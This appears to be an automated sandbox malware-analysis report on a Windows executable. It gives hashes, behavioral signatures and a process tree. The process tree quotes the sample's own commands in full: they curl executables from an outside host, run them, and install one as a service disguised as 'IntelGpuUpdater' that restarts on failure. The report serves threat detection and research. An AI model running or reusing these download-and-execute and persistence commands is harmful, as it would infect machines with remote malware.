Analysis
-
max time kernel
119s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-12-2024 21:06
Static task
static1
Behavioral task
behavioral1
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
Resource
win10v2004-20241007-en
General
-
Target
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
-
Size
5.3MB
-
MD5
c13d6d5a9aa229499ee0ff1f698a2ee0
-
SHA1
2a7ac214047525c963cfd8d1be692c50bdbb9c46
-
SHA256
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba
-
SHA512
5c9e4b30dbd6c5414ea04a70b109e6dc9f8287affe014e47ed0797ff63ac904223751557e44bff99cf8ecfce3c8b748cef55c1d3db88905431f4049039042059
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD4:hrj30qkXnsr2YIIog7if+HJFs
Malware Config
Signatures
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 292 wrote to memory of 2344 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 31 PID 292 wrote to memory of 2344 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 31 PID 292 wrote to memory of 2344 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 31 PID 292 wrote to memory of 2344 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 31 PID 2344 wrote to memory of 1516 2344 cmd.exe 32 PID 2344 wrote to memory of 1516 2344 cmd.exe 32 PID 2344 wrote to memory of 1516 2344 cmd.exe 32 PID 2344 wrote to memory of 1516 2344 cmd.exe 32 PID 292 wrote to memory of 1324 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 33 PID 292 wrote to memory of 1324 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 33 PID 292 wrote to memory of 1324 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 33 PID 292 wrote to memory of 1324 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 33 PID 1324 wrote to memory of 2084 1324 cmd.exe 34 PID 1324 wrote to memory of 2084 1324 cmd.exe 34 PID 1324 wrote to memory of 2084 1324 cmd.exe 34 PID 1324 wrote to memory of 2084 1324 cmd.exe 34 PID 292 wrote to memory of 2480 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 35 PID 292 wrote to memory of 2480 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 35 PID 292 wrote to memory of 2480 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 35 PID 292 wrote to memory of 2480 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 35 PID 2480 wrote to memory of 2116 2480 cmd.exe 36 PID 2480 wrote to memory of 2116 2480 cmd.exe 36 PID 2480 wrote to memory of 2116 2480 cmd.exe 36 PID 2480 wrote to memory of 2116 2480 cmd.exe 36 PID 292 wrote to memory of 2912 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 37 PID 292 wrote to memory of 2912 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 37 PID 292 wrote to memory of 2912 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 37 PID 292 wrote to memory of 2912 292 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe"C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:2912
-